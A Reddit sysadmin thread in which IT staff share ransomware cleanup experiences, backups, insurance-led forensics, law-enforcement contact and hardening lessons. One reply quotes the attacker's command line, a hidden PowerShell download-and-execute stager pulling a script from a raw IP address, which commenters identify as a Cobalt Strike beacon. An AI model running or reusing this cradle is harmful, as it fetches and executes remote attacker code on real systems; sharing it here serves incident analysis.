So who’s had the fun of ransomware cleanup.
Posted by cidknee1@reddit | sysadmin | View on Reddit | 169 comments
So I’m 57 hours in and I have t added Thursday yet. I’ve also never heard of the hacking group calling the victims. Anyone else?
hzuiel@reddit
Never experienced a major lateral move ransomware. We had a worm proliferate in one building to basically every windows machine, but it couldnt spread beyond that. It wasnt ransomware either. The others were single pcs that were just reimaged. Some just claim they were ransomware but the data wasnt even actually encrypted.
Key_Way_2537@reddit
Psst. Not all ransomware encrypts the data. There exfiltration type, etc. some do both.
hzuiel@reddit
The ones I am talking about literally were faux ransomware, like all thry do is autorun a full screen browser tab with a page that says your computer has bren locked by the fbi and all your files encrypted but absolutely nothing elsr in the background happened. Another one said all your files have been encrypted but reqlly they were just mass switched to hidden and replaced with shortcuts with the same name and icon that were links to bring back up the countdown timer.
Key_Way_2537@reddit
Ah. That’s really small potatoes decade ago type stuff. It’s not like that at all any more.
hzuiel@reddit
Yeah I know, I was replying to the OP about if you've had the fun of ransomware cleanup, and I was explaining that I had not and the closets that I have experienced.
UptimeNull@reddit
No redundancy or failover. Wtf
cidknee1@reddit (OP)
Oh we had failover. And offsite backups. We were in the process of doing some upgrades and they are being done now.
Consistent_Chip_3281@reddit
Do you wanna come back and add like a little high level list of stuff you did?
cidknee1@reddit (OP)
I can.
Consistent_Chip_3281@reddit
After that beer am i right?
cidknee1@reddit (OP)
Not beer. Mikes hard freezies.
They taste just like the frozen things in plastic you’d get a box of. I like the red and blue ones. You don’t even taste the alcohol lol.
a60v@reddit
Good for you for not paying the ransom. More companies should be in that position (good backups, not-terrible security).
Dardiana@reddit
Multiple times for a variety of clients. Most annoying ones are the ones where insurance wants to bring in their own team to investigate and they slow play the hell out of it before you can do any remediation work.
Strangest one was where the FBI called the client saying they knew they were encrypted and offering the decryption keys. Which came just after everything was restored and PC's rebuilt. So they were on the ball. Verified it was them by calling the local field office and asking for the agent in question.
Jeff-J777@reddit
That was our issue our cyber security insurance wanted to bring in their own team. We got hit on a Thursday night, on Friday St. Patrick's day I got a call our ERP was down after 15 minutes of troubleshooting I found out why. We found out Friday our backups were fine, but our entire ESXi stack was encrypted along with the Veeam console VM, and we had 12 locations that needed to be physically checked. By Friday evening we worked with Veeam (Which BTW were excellent and even assigned a dedicated team to helping us restore our backups) to spin up a new console and we were ready to restore the VMs. But the team the cyber insurance brought in wanted to collect logs from our ESXi hosts and we were not allowed to touch them. So my director and IT started to call in favors for loaner servers to spin our VMs back up on. By Saturday about 60% of the VMs were restored. Sunday server wise we were about 80% operational and allowed people to start working. The rest of the two weeks were spent restoring about 60 workstations and getting everything re-deployed. Then migrating our VMs back to our ESXi stack once I re-build that.
We did not expect this team to hold up our restore process but they did. I think we also got a call along the way from the FBI about the ransomware and asked if we wanted the decryption key. But by that point we either had wiped and restored and nuked and reinstalled just about everything.
routertwirp@reddit
Had homeland security call me to let me know a user on my network had downloaded a payload that had not been released. I did everything I could to prove it was some kind of fraud or social engineering, but I’ll be damned if he wasnt right. Saved my bacon that day.
drowningfish@reddit
Were you able to identify what the payload was, and where it originated from?
UptimeNull@reddit
Phishing link. You know the jam!
routertwirp@reddit
I don’t really care what the payload was, came in via email link, and of course, she clicked on it… multiple times.
UptimeNull@reddit
I was wondering if you called. Great job!
root_b33r@reddit
must have been related to that bust that happened in Gatineau Ontario, I know the FBI helped out a lot of people with that bust
Vertimyst@reddit
There was a bust in Gatineau? I'm from the area and hasn't heard about it.
Gaunerking@reddit
Also know of case here in Germany, where the feds provided the decryption key.
(It was the BKA, basically our FBI without the counter-intelligence stuff, only crime/terrorism)
RagingITguy@reddit
I had the RCMP call me. Not with decryption keys but they gave me a server name and verified some of our data was floating around.
At that time it was two or three days without sleep and my idiot boss thought it was a prank call.
Thankfully one of my coworkers took the reins, got the investigator back and they helped us out some.
JustFucIt@reddit
We had some cyber crime branch of the RMCP call us to alert us we were serving up crypto miners, looked like a vbuck generator iirc.
A website plugin (managed by marketing dept) was years out of date, surprise surprise..
VirtualPlate8451@reddit
Have also worked a few with the same IR company brought in by the insurance carrier.
We could have had both up in 72 hours but they needed to gather forensics so we limped along with 15% of the staff working for a couple of weeks.
pirate_phate@reddit
When the FBI called was that late 2022, early 2023 by any chance?
RB-44@reddit
Badass
Wretched_Ions@reddit
Karakurt?!
cidknee1@reddit (OP)
Once more but English this time? 🤨
Wretched_Ions@reddit
Karakurt is the name of malicious actor/org that I have encountered.
cidknee1@reddit (OP)
Ah. Nah this was volcanic something.
No surprise they are out of Eastern Europe.
Advanced_Vehicle_636@reddit
Professional ransomware. Shitty ransomware. Nearly hit by ransomware. I've unfortunately seen pretty much all of it. As I've told others - make sure to take care of yourself. I've seen cases where clients recover in a few hours (shitty actors) to complete destruction of enterprise networks and systems taking years to recover from.
The fun bit starts when insurance (if you have it) gets involved.
cidknee1@reddit (OP)
It’s almost mandatory here to have cyber insurance with your business insurance here.
Luckily that’s above my pay grade.
danison1337@reddit
how does someone executing a ransomware on his computer penetrate so much of your infra?
cidknee1@reddit (OP)
Well, it started on one computer, and that computer has access to file shares. Those file shares lead to the servers.
Thank god they didn't get the backups or the sql database. That would have been so much worse.
danison1337@reddit
but it still had to be executed with admin privs on the server to cause any harm there.
cidknee1@reddit (OP)
They had domain admin creds. They he user on that machine was a domain admin. Shouldn’t have been but that’s how the old guy before me set it up.
alaub1491@reddit
Dealing with this this week. I'm in a very similar situation to you. Unfortunately they got our clients local backups so we've been pulling down from the cloud.
pdp10@reddit
These were almost always environments with SMB-protocol fileshares, and typically where a regular user account can write most files, at least originally. Now it seems fairly common for there to have also been some successful privilege escalation attack, and use of RDP is common.
Environments without those things are going to have a much smaller attack surface, but aren't immune from credential-stuffing, sending malware over internal email, etc.
joe_valuable@reddit
We had a user download a "2fa" app for his PC. Got a call from sophos after some scripts were run on a server. GoC Cyber Security called as well as someone from BoA. Got the server and pc isolated and cleaned up before any encryption could take place. All told I was up for 36 hours straight working on it.
richardvt@reddit
I have done a few, find the workstation with encrypted files on it take it off the network and wipe it then delete the encrypted shares and restore from backup. Usually doesnt take much just downtime waiting for the restore to finish
Practical-Alarm1763@reddit
A couple of times when I was with an MSP, we dealt with ransomware, but that was back in the days of CryptoWall when it was just a simpler form of attack. We simply just restored from backups and that was that.
Nowadays, ransomware has evolved, with highly organized and well-funded groups as a professional career. In many cases, they infiltrate systems months in advance, ensuring that even your supposedly secure, immutable backups are infected and rendered useless.
These days, they will go as far as contacting victims directly to negotiate ransoms through phone, texts, and emails. I’ve heard of this happening frequently in other organizations within our industry.
They often demand the full payout from cyber liability insurance and negotiate terms. If you pay, they’ll provide the decryption key and won't leak any data. Oddly enough, these groups tend to stick to their word because if they don’t, people will stop paying the ransom, knowing there’s no guarantee they’ll get their data back.
Consistent_Chip_3281@reddit
This makes me wanna meet my insurance company people and get an sop together, haha how to even broach that topic,
cidknee1@reddit (OP)
This is what the RCMP told us. They are monitoring the dark web for the customers info and apparently these guys never release data even after threatening to do so.
We got it cleaned up and now its a LOT more secure of a network. This customer is awesome about saying I don't care what it costs fix it.
Were going so far as to change the public IP and it was the owners idea.
operativekiwi@reddit
Changing the public IP does nothing. It's like getting your house robbed and changing your mailbox number
RagingITguy@reddit
Ah i had the RCMP call top. Though not sure what changing your public IP will do but hey anything goes.
We restored from backup. I interrupted the data exfil before they encrypted so no notes or anything left for us.
They didn't get much but it was a learning experience for me. Not much so for the organization be cause since I left they actually got ransomwared since nobody took my advice or Acted on any of the notes I left.
That shit kept me up at night. Now I work for a more competent company.
DarthJarJar242@reddit
State-funded groups. Fixed it for you.
Seriously though, the well funded groups have basically all been tied to state agencies. Look up APT41.
FapNowPayLater@reddit
There's an entire eco system.
Telegram channels where suspected APTs provide payload target data and bounties to low level skids, with the understanding that only they will have access in the event of a compromised account.
The malware generally pivots it's C2 to one controlled by APT after a time to ensure it's not double sold.
Practical-Alarm1763@reddit
I agree with you. That goes without saying.
FapNowPayLater@reddit
Post remediation, we've had victims get calls from google numbers trying to further shakedown victims via release of data.
It never went anywhere just desperate Bulgarians
moldyjellybean@reddit
I mean it sucks but there’s always a silver lining you get to test your recovery process, if it works, how much down time, etc.
Been there. SAN snapshot restores was by far the easiest. Been times where they requested it restored from offline Veeam Backup too which was a definitely more labor intensive.
The worst is having everything recovered and hearing a c suite say they lost years of data because they saved it locally on their laptop in some obscure place. Turns out all the work to decrypt it was just pics of family vacations, fishing trips and Christmas party.
It was so long ago but I think most lost trust relationship with every server.
kanzenryu@reddit
This is a better level of enterprise support than many vendors can manage
EmbarrassedCockRing@reddit
There's also ransomeware as a service, RaaS. They have legit customer service and everything. Shit is wild.
cidknee1@reddit (OP)
It is crazy stuff. These guys are awesome. Literally anything they need we get.
LucyEmerald@reddit
Dont forget to collect your overtime
cidknee1@reddit (OP)
One nice thing about this company is I DO get overtime on salary.
skeetd@reddit
This happened to a former company where it was early 2000s Ibawas but a wee Jr. a group out of China. I'm not sure where they got Intel about us and what they were targetting, Needless to say, they got what they wanted. Had they actually vetted the company, they would have realized we had nothing of value and backed everything up. Yea, we had a database of names, phone numbers, job titles erc. for our clients, and employees,but it wasn't much.
cidknee1@reddit (OP)
Linked In is very popular for these guys. Full list of companies, emails everything. Makes life easier.
post4u@reddit
I've been there with our organization. Multi-million dollar ask. Worst week or two of my 25 year career in IT. We were able to recover without paying.
No, never heard of that group.
cidknee1@reddit (OP)
Oh yeah.. I've had a few. This was one of the easiest due to almost every pc but 2 being brand new in the company.
post4u@reddit
When the dust settles and if you're comfortable sharing, which of the following were you guys doing before you were hit?
Least privilege model (not logging into computers or servers with admin accounts and using separate, dedicated admin accounts to elevate)
LAPS
EDR/MDR/XDR
3rd party mail security
2FA on all accounts
Patch management
Firewall vendor and features?
Drive encryption
Immutable backups
Privileged account usage reporting
SIEM
--
Or rather, what do you think you were NOT doing to be vulnerable?
cidknee1@reddit (OP)
We were in pretty good shape. I just took them over from another tech who didn't like to put any bother on the clients with things like 2fa etc.
We think it was infected through an FTP site the CAD guys were using to transfer some big files. Either that or a clicked link in an email.
NOW we have all the things. I just got off a conference all showing them how the system could be reporting false positives and it's found some shaky stuff and quarantined it all. And one of them is the punch in/out tool.
Until I hear from the vendor...in writing that those files are needed I aint allowing them, and the owners have my back on this.
2fa is going to be a learning curve, but lets just say that the security posture is in much better shape.
They did have an admin account, and we took that away and are using auto elevate. We didnt have immutable backups. We use meraki for firewalls and patching is monthly. Mail is 365 and I don't believe there was drive encryption ( there will be now) we did have soc monitoring and EDR. thats why we caught it as quickly as we did. They called us and we told them to isolate and the guy heard wrong and didnt. They called back and asked again, the next guy only isolated the one server. I got on and nuked both nics on the hosts. The next morning we saw the ransomware notes. Which didnt ask for any specific amount. Then they started calling the employees, really bad connection and eastern european..of course.
This is what happened.
COMMAND LINE: powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://94.156.69.157:801/aa'))"
everything was encytpted with .nba.
Im at 69 hours this week. I think I need a beer.
Dracozirion@reddit
That's a cobalt strike beacon right there.
Dracozirion@reddit
S1-CSBeacon - Pastebin.com
I couldn't get very far as I'm not expert on it, so in the end I just ran the stager in a VM with SentinelOne installed. You can find the detections on the paste above. I wonder which EDR you were using?
smc0881@reddit
Yea, that's not the ransomware payload. It's most likely CobaltStrike, TrickBot (if still used), or some other RAT. The BXOR -35 usually means CobaltStrike though. I'd double check your backups for any scheduled tasks or things like that. I am helping a client now and they had a Python based RAT that was on their backups for months prior to the ransomware. Some of the ransomware groups just buy creds now from brokers who go around breaking into systems and hoard creds.
cidknee1@reddit (OP)
That I will check. Never hurts too. We also have some pretty aggressive edr and monitoring policies.
smc0881@reddit
If it's not a known bad or acting maliciously it probably won't get picked up by the EDR. SentinelOne didn't catch on to it and I've seen similar behavior from other EDR programs too.
post4u@reddit
Thanks for the taking the time to write all that out. It's always interesting to me to hear about the state things were in (and what gets put in place afterwards) in these situations. Ours happened in 2021 and we're still adding layers.
cidknee1@reddit (OP)
No problem.
Thankfully these are awesome customers who actually listen to what we say. I quite literally have a blank check to do what’s needed to make it right and secure.
I also like to help and let others know about it. I should have put it in my initial post but I was really zonked out.
thortgot@reddit
All of these things are important and can mitigate many attacks.
Don't confuse that with doing all these things makes you immune (beyond immutable/offline backups).
The actual major risk today is data exfiltration which is incredibly difficult to defeat and takes a magnitude more effort to resolve.
post4u@reddit
Oh I know. Just wondering if there was any low hanging fruit that may have been missed. I'm always wondering about that stuff when I hear of these attacks. In our case a few years ago, we were missing several of these layers and got owned.
throwaway56435413185@reddit
Wow, you must be new to IT, and think cyber security is all the rage.
Let me explain this to you simply. Sally in marketing is going to open every damn email she gets, no matter what you do. Prepare to deal with it. You are in a system admin sub, we are used to managing cyber security guys. You’re cute, but don’t waste the pros time with your attack vector nonsense. We know the problem lol.
RatsOnCocaine69@reddit
Why can't we just have nice conversations :(
post4u@reddit
You kids and your dumb wannabe insults with throwaway accounts. I'm not a security guy. I just want the one event I've been through to be a once in a career experience.
Can you prevent everything? No. But do you give Sally local admin access to her computer? Maybe just let her use a domain admin account for her day to day work? Or maybe not run any endpoint or mail security? Firewall? What firewall? Waste of money. I guess you do that in your organization while you close your eyes and let Jesus take the wheel. But the rest of us do make a best effort to prevent what we can. While I hate hearing about serious ransom ware events, I do like hearing what was in place at the time vs. what was not so we can all keep learning about things that work and what doesn't. While I do think prevention of exfiltration and having proper immutable backups are the most important things to do so an organization can recover, I'm not going to do absolutely nothing and just expect for it to happen. If you want to do that, you do you.
throwaway56435413185@reddit
Wow. A lot of assumptions you made about me and my 25 years in IT. Guess you haven’t been around long enough to understand that you report to someone, and that someone has given Sally permission to do the dumb things. You will get there, don’t worry kid, I believe in you.
post4u@reddit
You've assumed a lot too. I've been doing this since the late 90s. Either you've never been through a big, expensive event that affected a large organization that could have been prevented by basic protections or maybe you're just trolling. Attackers typically hit two kinds of targets: high value or ones that are easy to attack. A lot of events are crimes of opportunity where basic security isn't in place. TBH that's where we were a few years ago. We didn't have dedicated security people. Just a few sysadmins trying to keep the wheels on the bus. We didn't have certain things in place that made our network vulnerable. We were doing things that were inexpensive and convenient vs. secure. We've learned a lot since then. Are we totally immune to another attack? Of course not. But I guarantee we won't be hit by the same vector that was used last time or by several other vectors that are now closed. We'll also be able to recover much faster if it ever haapens again.
But yeah, keep doing nothing and just expect it to happen. Have fun cleaning it up. I'd prefer to make it at least a little harder for the bad guys.
throwaway56435413185@reddit
I do what the execs say, because that’s why I get paid lol. And that’s why I make a stupid amount. Maybe you should cya a bit better, because then you just DGAF about the big events. All it means to me is I get a better bonus or extra time off for dealing with it lol.
redmage753@reddit
You sound like you've never been around the block for 25 years of alleged experience.
The reality is, not everyone knows everything, and the more we share, the better off everyone is. Some people learn old things as new to them, some people remember the old things or learn new things. Exposure is good. It's why forums like this are healthy to have. You don't have to make every mistake yourself.
If you think you know everything there is to know after 25 years, then I definitely know you don't actually have 25 years of experience in anything remotely complex.
Kumorigoe@reddit
Cybersecurity guy here. I'm not "managed" by a sysadmin. Grow the fuck up.
throwaway56435413185@reddit
Yeah you are. You do the work we don’t feel like doing.
nachoha@reddit
I had one clean-up with over 120 TB of files, caught it early and while it looked like all the files were encrypted (Files all had been changed to the same extension, and 0-byte files with the original file names were created) it turned out only a small percent had been changed and the rest of the renamed files were fine. Deleted the 0-byte files, removed the added extensions, and restored the encrypted files from backup. It didn't take me long once I discovered that.
AustinGroovy@reddit
Been there.
rongway83@reddit
Been involved in a few....yep sometimes we've been in communication with them.....its a weird wild wild west. All I can suggest these days is make sure you have good secure backups. FYI our attacks prioritized crypto lockering the backups before the rest...
elloMotoz@reddit
We had a large client get hit a few months ago. 500 PC's, 90% of them had to be wiped and reimaged. They did call the IT guy several times asking if they were going to pay up. Cyber insurance, FBI were involved. It was a mess, luckily the servers were bare metal restored from backups within a few days.
Bane8080@reddit
Lots. It was nice back when the ransomware had bugs and you could decrypt it for free usually.
Few-Dance-855@reddit
Recently went through this
They encrypted our VM using the esxi admin vulnerability so most of your AWS & VMware servers were encrypted.
It wasn’t too bad - boss bought us food, was super understanding and it helped beef up the security and I got to understand the entire infrastructure.
Look at the bright side :
I got to meet the feds since we operate critical infrastructure and it’s a great resume builder.
Sad to say that it happens more than you think and using this as experience catapults you to a different league
eagle6705@reddit
I had, sadly first time it took me 2 hours to full recover and it didnt go past the group share. 2nd time 1 hour...3rd and 4th and sadly 5th only 30 mins.
We have our share locked down and make sure people have their corect access so thankfully it never spread beyond the user's assigned roles. I had a script running that monitors for files and alert me so the 4 and 5th time we were able to recover without hte users even knowing it
FlyingFrog300@reddit
May of 2020… I still have PTSD. I was the director of IT at the time and my senior sysadmin had just left and we hadn’t replaced him yet. It was long days rebuilding everything from backups. I slept at the office on a camping cot. Brought in our operations staff to do IT tasks. It was marshal law until we resumed normal operations. We didn’t pay. Absolutely the worse experience of my career. Changed my perspective drastically.
Key_Way_2537@reddit
Fuck. Going through it right now. Two co managed customers with local IT that ‘knows what they’re doing’. Both got hit in the last month for the second time - both got hit in late 2021 as well. Different groups. Different methods.
The list of security recommendations now is mostly photocopy of the ones from 2021 which were copies of the ones from 2017. The companies just do not give a shit.
I hate these people.
finke11@reddit
Blacksuit got one of our clients last december. Believed to be successor of the Royal group/ransomware. I’m a tier 1 at an msp. Tier 3 coworkers had trouble restoring the veeam and wasabi backups but eventually got it done. I was tasked with deploying the new VPN solution (Meraki). It ended up being the CEO got phished in november and it was a 7 digit ransom number. A not-so-cool “welcome to IT”moment for me.
cidknee1@reddit (OP)
Ouch. That’s a fun introduction.
K3rat@reddit
God bless. Don’t forget to call CISA.
cidknee1@reddit (OP)
Canada. No Cisa.
The-Sys-Admin@reddit
I personally put in 120 hours in 10 days with the aid of a recovery crew before I got my first day off. And I got lucky and pulled the plug before they do even more damage.
It sucks. But i just treated it like I was deployed again and got the mission done.
It's shitty but the day will come sooner where you go to work at a normal time and log in and just start doing tickets again.
I got there and so will you. Hopefully your work will compensate you like mine did with a much appreciated bonus.
I believe at you.
cidknee1@reddit (OP)
Luckily my company had me on salary, and I get overtime.
In the end it’ll all wash out.
Paladroon@reddit
Technically twice. Neither were terribly difficult restores, thank goodness. Backups were good, identified the source and to an extent folder permissions prevent too big of a spread (though we locked down further still afterwards.)
Most of the work came from working with our security team to analyze if data was just encrypted or if anything was taken out too. I had JUST come back from vacation into that one.
The second time was incredibly small, just a few files, easy restore.
philldmmk@reddit
Any tips on how can it be check if data has been taken out? Thanks in advance.
Paladroon@reddit
I wish I had more helpful info than we do. We were a lot smaller and didn’t have a great deal of logging. We had a third party security firm helping who got various memory dumps and access to the files that were hit and the exe.
Ultimately we weren’t able to come to a solid conclusion, so we erred on the side of caution and offered credit monitoring to basically a blanket of anyone whose info was in the affected folders.
It wasn’t ideal, but now that we’ve grown and redesigned things we have historical data transfer logging and whatnot to give us better insight. We can see flow rates overall and use that to dig into what sources were active and how active they were.
rose_gold_glitter@reddit
Yeah I used to run a business that, among other things, specialised in DR and, in particular, Ransomware recovery. So I was involved in plenty of clean-ups, albeit with the problem of being directly impacted. I had the fortunate situation of being paid by the hour to fix other people's messes, without the impact of my own business not working during the clean up. So my exposure will be different from others.
I still saw the stress and anxiety and fear in the business but I also got to play "hero" and come make everything ok again. In the best cases, clients that used our solution 100% had no downtime at all - immediate and full recovery and back to work. In the worst cases, people used us exclusively for off site backup, and yes, we could recover them but the recovery time was days, not hours. In those cases, it was a lot of meetings and sitting in their office brining things back for them one by one as their own IT team was too swamped to cope.
Overall, like I said above, for me, a Ransomware incident was essentially a golden pay day - we got thousands in hourly fees and we got to be the heroes, so companies loved us. Very different from being the victim.
Texkonc@reddit
Been there. 5 days of 15h calls with vendors, etc…. And that was just the remediation, we were a small team so it took many many months to improve things afterwords.
Ok-Condition6866@reddit
I did 72 hours
cidknee1@reddit (OP)
There’s still reboots tonight lol. That’s just too many hours.
Ok-Condition6866@reddit
It was 72 hours straight. It was painful.
IStoppedCaringAt30@reddit
Yup. Down for a month. 12 hour days minimum. Weekends. Brutal.
Superb_Raccoon@reddit
Restore from last known good snapshot, roll forward DB logs to point of infection.
Around 10 minutes to restore the snapshot, 2 more hrs to roll the logs.
Loss of 25 min of data.
cidknee1@reddit (OP)
Nice.
I can’t say we were that lucky. We lost about a week. Luckily they didn’t crypto the edr db so we restored from that from the day before.
Just a week of loss production. Well they were running at about 20%.
Superb_Raccoon@reddit
Not lucky. Planned and processes + gear in place for when it happened.
IBM Flashstorage with FCM's that detect intrusion by sampling read/write, and Preditor to scan the snapshots after they are taken.
Superb_Raccoon@reddit
I should say that we lost DEV, and that took a lot longer. I am supposed to get budget to replace the PRD storage with the newer FCM and F5300 and roll that down to Non-PRD now that it has proven it's worth.
That would have had saved a week or more restoring DEV from tape and such, but they didn't want to spend more to protect it so... oh well.
Not very expensive stuff, I think we were at 650 a TB, plus \~$4000 a year to protect with Preditor.
dansedemorte@reddit
yeah, if it happened to my work it would be well above my paygrade.
but, while it might suck trying to rebuild 14PB of storage and servers in theory all of our data is backed up to LTO tapes....of course it would take who knows how long to restore all of that....
ListenLinda_Listen@reddit
We work for some remote offices (business units) of a multi-national corp. The ransomware came in through the parent company VPN. It was interesting and frustrating to see how different their approaches to recovery were considering they are all owned by the same parent company. Some companies were up in a week, some 4 weeks. Some hired experts (some of the experts were actually idiots), some did it in house.
Luckily it wasn't stressful because parent company was very slow to respond, the experts were slow to do much; it was a lot of waiting around.
Strange experience for sure.
Behrooz0@reddit
Around 300 times or so I think. I do it as a side job. I'm pretty used to it by now but still often have to calm people down from panics.
Some of them really sucked during covid time. Had to stay up for like 20 hours at times because I had hospitals and clinics hit. I started when EternalBlue happened.
OkIndependence7978@reddit
had this recent as well, but diff group, It was mandatory to store all data on FS servers, and then we use rubrik to back those up with our ec2 servers, it took me 25 mins of clicking around, and then fresh install of windows for a few machines.
was great
detmus@reddit
Twice. Most recently when I was about three months into the gig with very little documentation (shocker), and an environment that was likely made “with best intentions.” We were popped before I joined the org, and they were simply waiting to flip the kill switch. Cleanup was not fun. The silver lining is that just about everything on my wishlist was bought and paid for in about a week.
Luscypher@reddit
Sorry pal... got ransomware 2 times, both of them were Security Guys f4cki.ng with their policies. My linux server never been compromised... cos I don't trust SecGuys
dolorousBalls@reddit
That makes no sense.
shadowtheimpure@reddit
Twice. I've had to do it fucking twice. Once for WannaCry and then once recently for one they didn't tell me the name of, just told me to start remediating.
Login_Denied@reddit
Working on one since Tuesday. Client was already in financial trouble; hadn't paid us in months and cancelled cloud backup before that. No up to date support.
Made a snap of the file server before it got encrypted and AD is ok. ERP is hosed. Veeam backup repo is encrypted as is the backup of the repo. Veeam replicas were deleted and VMFS vols removed. Trying to scrape those for VMDKs now. Been over a day and the scan is at 12%.
arkain504@reddit
Been through 2. First one: Hospital had awesome software, killed the user they gained access with and stopped it after 50,000 files were encrypted. Took 9 hours of hunting through folders and restoring from back to get everything back.
Second one: no software for this, old OS versions and was there for a month before attack. Took down everything dept for 1 backup. Took 39 hours from start to finish to build back from the PDC we still had. I fell asleep on the phone with VMware support more than once.
SiIverwolf@reddit
More times than I care to count. The joys of MSP life.
cidknee1@reddit (OP)
Yeah every one I’ve ever been involved with has been with a msp.
I like this msp, good people and some awesome customers.
PhantomNomad@reddit
Went home for lunch like I always do. There are always a couple people that stay at the office for lunch. Came back a few minutes early, went to open a file on the shared and got the dreaded message that my files have been encrypted. Went over to the server rack and pulled the network plugs. Then I shutdown the servers. Found the machine that was infected and started a restore from backup (only a few days old). I then booted the file server in safe mode and made sure it was clean then restored all the files from shadow backup from 7am that morning. Ran a virus check on it and everything came back clean. Turn on the rest of the servers and and made sure they where clean. By 3pm everything was back up and running. The virus didn't have time to infect many other machines or encrypt many files thankfully. It was probably only running for 10 or 15 minutes. I think the person who was infected got it from a newspaper website. Probably one of the ads. I got lucky that day.
cidknee1@reddit (OP)
Boy did you ever. Our SOC was supposed to isolate immediately, idiot there didn’t and said I was on the servers. So 10 min later something was bugging me so I remoted in and nuked the nics on both hosts. Luckily it hadn’t gotten to our backup machine yet.
g3n3@reddit
Hive group got us. Down for months. It was horrible.
cidknee1@reddit (OP)
Damn. Is hat sucks. Hopefully y’all are ok now.
g3n3@reddit
Changed the org forever. MDR and insurance and concierge. More accounts. More security. More network ACL.
cidknee1@reddit (OP)
Honestly that’s a good thing. At least they learned, sad it had to be the hard way.
TheWino@reddit
Went through it once. Had to nuke everything. Took around 3 months to be back up and running completely. We didn’t pay out all new budget went to upgrade hardware/services. They wanted like $3mil 😂. Spent around $200k in upgrades instead.
Allwhitezebra@reddit
I was at an MSP onboarding a client and noticed something fishy on the DC. Installed our one of our agents on it and ran a full scan while I was continuing documentation for the site. Agent finds 300 hits for Emotet. Basically told him we’re not moving forward unless we or someone else fully cleans the site. 29 hours later I could finally get some sleep.
bluehairminerboy@reddit
Strangely enough we had one that just looked more like a data exfiltration - they took a load of backups of databases and files, encrypted a few config files on servers but no actual data. Demanded a ransom otherwise the data would be published, but nothing happened.
Shaded_Newt@reddit
I've had 3 while working at an MSP. 1 instance we managed to isolate to a single work station before it spread to others, one was someone's personal computer they brought into our office.
The 3rd was not so easy. The client had no security in place, and many shared passwords/user accounts and email addresses.
We had them running in Datto's disaster recovery cloud within a week from a known good backup which helped tremendously.
It took 3 months to clean up with every week being anywhere from 60 to 80 hours. At the end of the incident we had rebuilt their entire IT infrastructure from the ground up, and rebuilt all of their VMs.
cidknee1@reddit (OP)
Damn. We have had 4 guys at 14 hours a day. And mine for 10 hours yesterday and 4 today. It’s gonna be a big bill I’m sure.
Shaded_Newt@reddit
I'm a bit jealous lol, the major one was a solo project, all of our other engineers were tied up for those 3 months on other tasks
cidknee1@reddit (OP)
Having a good team is the best. I owe them many beers.
Seedy64@reddit
Backup, backup, backup. Physical backup rotating 3 drives weekly or whatever the pain threshold is for the customer. 2 of the drives kept in 2 separate off-site location air-gapped. At most, you'll lose a couple of weeks worth of data. Better than paying millions.
cidknee1@reddit (OP)
We do on-site backups with nightly offsite replication. We went back a week as per the soc monitoring.
Rawme9@reddit
Welcome to the club. Got hit over a week ago, I'm finally getting a day off today. Not fully recovered but looking okay
cidknee1@reddit (OP)
This is my 3rd, not my first rodeo.
Delta31_Heavy@reddit
Had a five day virus outbreak once. Every time we thought we got it done it popped up again. Over 110 hours put in that week from Monday to Saturday with some 30 hour days thrown in
JustDandy07@reddit
We took over a client and hadn't even had time to really look at their network to put together a real plan on what to do. The hackers must have been in for a few weeks/months waiting for the right moment. They got ransomware'd and essentially had no backups thanks to the cowboy who was doing their IT for 20 years before us. RDP was wide open to the internet. The password to the default domain administrator account (literally the account called Administrator) was just the name of the company, all lowercase.
We ended up just paying the ransom and luckily the hackers were legit and gave us real keys to decrypt everything. I'll never forget my boss having to walk through the streets of this major metropolitan city with $5000 in cash in his pocket to go buy 5 Bitcoins at a Bitcoin ATM at some shady bodega. It would have taken a week or two to get the bitcoins via any other method back then (10 years ago?). It was wild.
I even called the FBI. They just took my info and didn't have much else to offer. They called back 5 or 6 months later but I wasn't in the office. They left a message. They never called back. I never called them. Why waste my time?
Worst experience of my 17-year career and it changed how I approach everything.
SteveAngelis@reddit
Yep. Longest 7 days of my life with the absolute least amount of sleep. And that includes having a new born spend 12 days in NICU (wasn't too sick but mostly precautionary) and sleeping on a child size rubber mat in the hospital.
TotallyNotIT@reddit
I've led 12 and it sucks shit every time. 7 of those we did initial containment and were backing up an insurance company's remediation team
killyourpc@reddit
2.5 yrs ago, out of Russia, lost every PC, every server, all VMware infrastructure. 280+ hrs overtime first 6 weeks. Was about 1.5 - 2 years of full recovery. Hit backups first, no immutable. Lots of lessons learned. Lots of burnout. Watch yourself, and don't let the job get ahead of your health.
bbqwatermelon@reddit
Better question is, ever think we are in the wrong business?
Ewalk@reddit
I worked in a medical clinic and they called into our PA system to announce their ransom.
That was wild.
I left soon after since it was like my second week and the board was already telling us we had to use cheaper remediation solutions. Saw that shitshow a mile away.
caffeine-junkie@reddit
Had to twice. We just identified the PC(s), pulled them and reimaged on a new hard drive and kept the old ones around just on case. Then for the shares that were even partially affected, we deleted them and restored from backups. Sure there was some complaining from the manager of those who had their computers pulled as they had important information on them, but then we just retorted with why it wasn't saved on the server then, that is backed up, if it was so critical.
One time only about a days worth of work was lost. The other it was a couple of weeks as it wasn't noticed for a long while, it was a seldom used share that only a few people had access to and the encryption was slow, probably as an attempt to exceed restore points.
A separate parallel activity was done by security to identify the ingress point. Both times it was email.
EntireFishing@reddit
I think I paid an MSPs first ransomware in 2012 or so. Should have bought some bitcoin then myself. Would have been set for life off £500. Can't believe I missed the easiest way to be a millionaire
BeagleBackRibs@reddit
I don't remember the year but Bitcoin was $400 and we had to buy 1 to get the decryption key. They had a $100 million dollar company on it's knees. I didn't even know what Bitcoin was. I had to go through some shady sites that moved money from the Philippines to Mexico. It wasn't easy to buy Bitcoin instantly back then.
EntireFishing@reddit
Yep exactly what I had to do. It was for a Premier League football club in the UK. My colleague Lee knew how to do it and he saved the day. I remember him saying should we buy some coins? Doh
newton302@reddit
Happened to our small org around 2013. Called my boss on the weekend and she said just pay ($300). We did and we got everything back. The way we paid was to buy a money card at Walgreens then give the hoods the number. I went home thinking gee this "anonymous currency" is a great idea. Bitcoin was really cheap then, and I was going to buy 1000. But the provider wanted me to send in my social security number just like a regular brokerage but I was so traumatized by the ransomware thing that I was too scared.
THEoMADoPROPHET@reddit
I’ve been there too. One of the worst parts is the uncertainty about whether the malware has been completely removed. I usually go for a complete wipe and fresh install to be safe. At least it’s a good excuse to upgrade the hardware!
cidknee1@reddit (OP)
luckily we did that a couple months before the attack. All brand new machines and such. We were in the process of getting a new server and getting rid of an old 2012 machine. Lets just say its just getting removed and scrapped.
Obi-Juan-K-Nobi@reddit
